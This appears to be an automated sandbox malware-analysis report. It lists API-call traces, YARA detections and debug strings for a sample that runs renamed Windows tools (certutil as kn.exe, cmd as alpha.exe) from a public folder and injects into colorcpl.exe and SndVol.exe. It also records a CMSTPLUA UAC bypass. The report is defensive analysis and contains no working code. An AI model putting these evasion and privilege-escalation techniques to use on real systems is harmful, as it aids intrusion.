Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A1FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A2A1FC34
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A97B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,	6_2_00007FF6A2A97B60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,	6_2_00007FF6A2A9BB50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A6FB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,	6_2_00007FF6A2A6FB50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A2BB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A2A2BB38
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A95B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,	6_2_00007FF6A2A95B44
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29C5BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF6A29C5BA4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AC5B90 CryptDecodeObjectEx,memmove,	6_2_00007FF6A2AC5B90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29EBB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,	6_2_00007FF6A29EBB80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,	6_2_00007FF6A2A8FB94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A55CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,	6_2_00007FF6A2A55CE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8FD2C CryptDecryptMessage,GetLastError,#357,	6_2_00007FF6A2A8FD2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A7DD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,	6_2_00007FF6A2A7DD1C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A13C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF6A2A13C60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AC5C54 CryptDecodeObjectEx,CryptDecodeObjectEx,	6_2_00007FF6A2AC5C54
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A01C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,	6_2_00007FF6A2A01C50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A51C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,	6_2_00007FF6A2A51C84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,	6_2_00007FF6A2A4B9CC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29EF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,	6_2_00007FF6A29EF9B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,	6_2_00007FF6A2A9BA14
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A89970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,	6_2_00007FF6A2A89970
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4B950 I_CryptGetLruEntryData,#357,	6_2_00007FF6A2A4B950
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A1F944 CryptDecodeObject,GetLastError,#357,	6_2_00007FF6A2A1F944
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2ABB980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,	6_2_00007FF6A2ABB980
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,	6_2_00007FF6A2A4597C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F7988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,	6_2_00007FF6A29F7988
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A23B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,	6_2_00007FF6A2A23B14
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A59AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,	6_2_00007FF6A2A59AF8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A67A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF6A2A67A70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A79A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,	6_2_00007FF6A2A79A58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F3A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A29F3A40
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A7BA50 CryptSignCertificate,SetLastError,	6_2_00007FF6A2A7BA50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A61A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,	6_2_00007FF6A2A61A44
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AC5AA8 CryptDecodeObjectEx,	6_2_00007FF6A2AC5AA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,	6_2_00007FF6A2A8FA84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AC5FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,	6_2_00007FF6A2AC5FF0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F5FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,	6_2_00007FF6A29F5FE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29FFF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,	6_2_00007FF6A29FFF64
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A35F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,	6_2_00007FF6A2A35F54
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A65FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,	6_2_00007FF6A2A65FA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A69F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,	6_2_00007FF6A2A69F90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F60DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,	6_2_00007FF6A29F60DA
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A34070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,	6_2_00007FF6A2A34070
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,	6_2_00007FF6A2A8E044
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D1DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,	6_2_00007FF6A29D1DE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A51E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A2A51E2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F5DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,	6_2_00007FF6A29F5DF7
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AC5D74 CryptDecodeObjectEx,strcmp,strcmp,	6_2_00007FF6A2AC5D74
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A19D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A2A19D6C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A21D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A2A21D70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A43D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,	6_2_00007FF6A2A43D60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A97D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,	6_2_00007FF6A2A97D3C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,	6_2_00007FF6A2A9BD3C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F5DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,	6_2_00007FF6A29F5DA1
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A1DD80 CertFindExtension,CryptDecodeObject,	6_2_00007FF6A2A1DD80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A75D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,	6_2_00007FF6A2A75D80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A97EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,	6_2_00007FF6A2A97EE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AC5F20 CryptDecodeObjectEx,	6_2_00007FF6A2AC5F20
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A17F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,	6_2_00007FF6A2A17F14
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A55F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,	6_2_00007FF6A2A55F04
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,	6_2_00007FF6A2A8DE70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AC5E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,	6_2_00007FF6A2AC5E3C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,	6_2_00007FF6A2A4DEB0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A1DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,	6_2_00007FF6A2A1DEA4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	19_2_004338C8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F745FF CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	19_2_06F745FF

Source: colorcpl.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 19_2_00407538 _wcslen,CoGetObject,

19_2_00407538

Source: unknown	HTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.4:49732 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 00000009.00000003.1697402992.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002092E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.0000000020976000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002095E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1849834813.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1674600317.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1677791285.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1682932441.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1694541931.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1695876898.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1696995181.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1698338645.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1697396433.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000E.00000003.1818028367.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000010.00000000.1825056965.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000014.00000002.1831678845.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000016.00000000.1848358095.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000002.1950757304.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1953053256.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1957430051.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.exe.2.dr, alpha.pif.14.dr
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 0000000F.00000003.1821823925.0000000005920000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000017.00000002.1942712119.0000000000C21000.00000020.00000001.01000000.0000000C.sdmp, xpha.pif.15.dr
Source:	Binary string: certutil.pdb source: kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
Source:	Binary string: easinvoker.pdbH source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: alpha.exe, 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1674600317.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1677791285.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1682932441.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1694541931.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1695876898.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1696995181.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1698338645.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1697396433.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000E.00000003.1818028367.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, alpha.pif, 00000010.00000000.1825056965.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000014.00000002.1831678845.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000016.00000000.1848358095.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000002.1950757304.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1953053256.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1957430051.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.exe.2.dr, alpha.pif.14.dr
Source:	Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 00000009.00000003.1697402992.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1822830202.00000000219AE000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002092E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1822830202.000000002197D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1848830449.000000000286E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.0000000020976000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002095E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1849834813.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698042458.000000000286B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ping.pdb source: esentutl.exe, 0000000F.00000003.1821823925.0000000005920000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000017.00000002.1942712119.0000000000C21000.00000020.00000001.01000000.0000000C.sdmp, xpha.pif.15.dr
